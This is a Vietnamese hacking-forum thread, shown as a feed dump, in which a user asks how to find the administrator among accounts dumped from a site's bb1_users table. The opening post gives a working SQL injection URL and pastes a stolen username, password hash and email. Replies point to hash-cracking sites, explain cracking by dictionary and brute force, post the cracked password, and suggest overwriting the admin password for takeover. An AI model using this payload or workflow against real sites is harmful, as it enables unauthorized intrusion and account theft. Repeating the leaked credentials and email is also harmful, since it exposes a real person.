<![CDATA[Latest posts for the topic "Làm sao biết ID nào của Admin ?"]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net Làm sao biết ID nào của Admin ? http://www.server.com/path/vidu.php?show=-1'/**/UnIoN/**/SElECt/**/null,null,COnCAt(userid,',%20',username,',%20',password,',%20',email),null,null,null,null,null/**/FroM/**/bb1_users/*  Và đây là những gì em nhận được:
Xin được trich dẫn một đoạn:
Thomas, 4a1043b4bc266b3712d3268c34e65673, le-maestro@web.de Google | Wikipedia Nein Ja  
Trong đó: Thomas la ID , 4a1043b4bc266b3712d3268c34e65673 chắc là pass đã được mã hóa (em vẫn chưa biết giải mã ra sao?) còn maestro@web.de có lẽ là email. Vấn đề là trong muôn ngàn cái ID như vậy làm sao biết cái nào của Admin,hay là em phải thử login vào từng cái một :oops: ]]>
/hvaonline/posts/list/13695.html#81829 /hvaonline/posts/list/13695.html#81829 GMT
Làm sao biết ID nào của Admin ? /hvaonline/posts/list/13695.html#81834 /hvaonline/posts/list/13695.html#81834 GMT Làm sao biết ID nào của Admin ? /hvaonline/posts/list/13695.html#81980 /hvaonline/posts/list/13695.html#81980 GMT Làm sao biết ID nào của Admin ?

kimsonha wrote:
Hồi hôm qua nghĩ mãi mà không ra.tối vế mới nghĩ ra! Chỉ cần lướt qua trang đó một chút là biết ai là Admin thôi mà! Rồi lai quay lại cái đống hỗn độn đó tìm, he he. Nhưng còn cái pass mã hóa kia, em chẳng biết xoay sở ra sao cả, một số trang chuyên mã hóa như gdataonline không thể giải mã quá dài như vậy.Mấy bác co soft nào chuyên làm việc đó cho em xin, chứ lấy được ID của admin xong mà không có pass thì ai mà làm không được! 
Bạn có thể vào đây: http://milw0rm.com/cracker/insert.php http://md5lookup.com/ http://md5.rednoize.com/ http://www.hashchecker.com]]>
/hvaonline/posts/list/13695.html#81984 /hvaonline/posts/list/13695.html#81984 GMT
Re: Làm sao biết ID nào của Admin ? /hvaonline/posts/list/13695.html#82010 /hvaonline/posts/list/13695.html#82010 GMT Làm sao biết ID nào của Admin ? /hvaonline/posts/list/13695.html#82481 /hvaonline/posts/list/13695.html#82481 GMT Làm sao biết ID nào của Admin ?

kimsonha wrote:
Mấy cái site bác BigballVN đưa ra chỉ mã hóa được một số kí tự đơn giản 
Không phải mã hóa mà là giải Hash.
tất cả chúng đều hiện thông báo: "Not Found in Database" hoặc tương tự. 
Tốt nhất bạn nên kết hợp các site đó lại. Vì có thể site này tìm không ra mà site kia tìm ra.
Mà em thấy hình như các từ có 6 kí tự trở lại thì mới mã hóa được thì phải. Chán thật ! 
Tất cả các chuỗi đều có thể mã hóa. Việc giải còn phải dựa trên số lượng từ có trong dict. Bạn có thể vào http://milw0rm.com/cracker/insert.php rồi insert hash mà không tìm được ở các site kia vào. Nếu may mắn bạn có thể sẽ giải được. Nếu chuỗi càng dài và có những ký tự đặt biệt thì việc giải càng khó. Bigball ]]>
/hvaonline/posts/list/13695.html#82509 /hvaonline/posts/list/13695.html#82509 GMT
Re: Làm sao biết ID nào của Admin ? Tất cả các chuỗi đều có thể mã hóa  Có câu này của BigballVN làm em vững lòng ngay.Thôi thì em cũng xin cảm ơn bác,em sẽ cố vật lộn với mấy cái MD5 Hash đó :lol:) ]]> /hvaonline/posts/list/13695.html#82711 /hvaonline/posts/list/13695.html#82711 GMT Làm sao biết ID nào của Admin ?

kimsonha wrote:

 
Ứng dụng gì mà kỳ vậy, thấy cách tạo bảng chứa thông tin đã thấy ngu rồi :P]]>
/hvaonline/posts/list/13695.html#82776 /hvaonline/posts/list/13695.html#82776 GMT
Làm sao biết ID nào của Admin ?

KINYO wrote:

kimsonha wrote:

 
Ứng dụng gì mà kỳ vậy, thấy cách tạo bảng chứa thông tin đã thấy ngu rồi :P 
Nếu mình không lầm thì đây là bug của Joomla. Đó là chỉ lấy một số table quan trọng thôi. Chỉ cần user, hash với mail là đủ rồi. :D) ]]>
/hvaonline/posts/list/13695.html#82785 /hvaonline/posts/list/13695.html#82785 GMT
Làm sao biết ID nào của Admin ? /hvaonline/posts/list/13695.html#83455 /hvaonline/posts/list/13695.html#83455 GMT Làm sao biết ID nào của Admin ? /hvaonline/posts/list/13695.html#83461 /hvaonline/posts/list/13695.html#83461 GMT Làm sao biết ID nào của Admin ?

kimsonha wrote:
xikenet nói đúng đó. mình đã vật lộn một cách vât vã với mấy cái MD5 hash đó 3 ngày liên tục rồi mà vẫn không ra.Mấy cái pass của member thì còn xoay sở được,chứ pass của admin thì bó tay thôi. Bác BigballVN nói "Tất cả các chuỗi đều có thể mã hóa " vậy bác thử giải chuỗi nằm trên hàng đầu tiên kia thử được không.Cũng là để em có lòng tin đó mà,chứ giờ nhắc tới MD5 là em đau đầu à! 
Mình nghĩ nếu bạn trích dẫn lại câu nói của mình thì phải đọc kĩ chứ :wink: Mình nói là
Tất cả các chuỗi đều có thể mã hóa  
Chứ không nói là tất cả các chuỗi có thể giải vì MD5 là dạng mã hóa một chiều nên việc giải nó phải dựa vào dict hoặc brute-force mà thôi. Việc giải bằng Dict cũng như brute-force phải có chút may mắn. Cho nên nếu bạn không thể giải ở bất kỳ trang nào thì tốt nhất hãy từ bỏ ý định đó đi. Vì những người kĩ tính thường đặt pass có các ký tự đặt biệt như $ # ! @ ^ %... những ký tự này làm cho việc giải hash rất khó thậm chí là không thể. Bigball]]>
/hvaonline/posts/list/13695.html#83472 /hvaonline/posts/list/13695.html#83472 GMT
Re: Làm sao biết ID nào của Admin ? 4a1043b4bc266b3712d3268c34e65673   minh thu no ra : discus]]> /hvaonline/posts/list/13695.html#102005 /hvaonline/posts/list/13695.html#102005 GMT Re: Làm sao biết ID nào của Admin ? /hvaonline/posts/list/13695.html#102065 /hvaonline/posts/list/13695.html#102065 GMT Re: Làm sao biết ID nào của Admin ?

Vo_danh_tang wrote:
Sao cậu không thử một cách sau: cậu đăng ký làm thành viên rồi select với username của cậu rồi lấy pass trong username của cậu (khỏi phải dịch ngược nha) sau đó thay pass của cậu vào pass admin trong csdl là cậu đã có quyền admin, sau đó tự set quyền cho mình là admin rồi thay lại pass là ok :D 
Vớ vẩn cái này là hack wa bug Bind SQL Injection làm sao mà update dc :| ... còn cậu gì ấy :D có gì up cái pass admin lên mọi người decode dùm cho ^^!]]>
/hvaonline/posts/list/13695.html#102080 /hvaonline/posts/list/13695.html#102080 GMT
Re: Làm sao biết ID nào của Admin ? /hvaonline/posts/list/13695.html#102387 /hvaonline/posts/list/13695.html#102387 GMT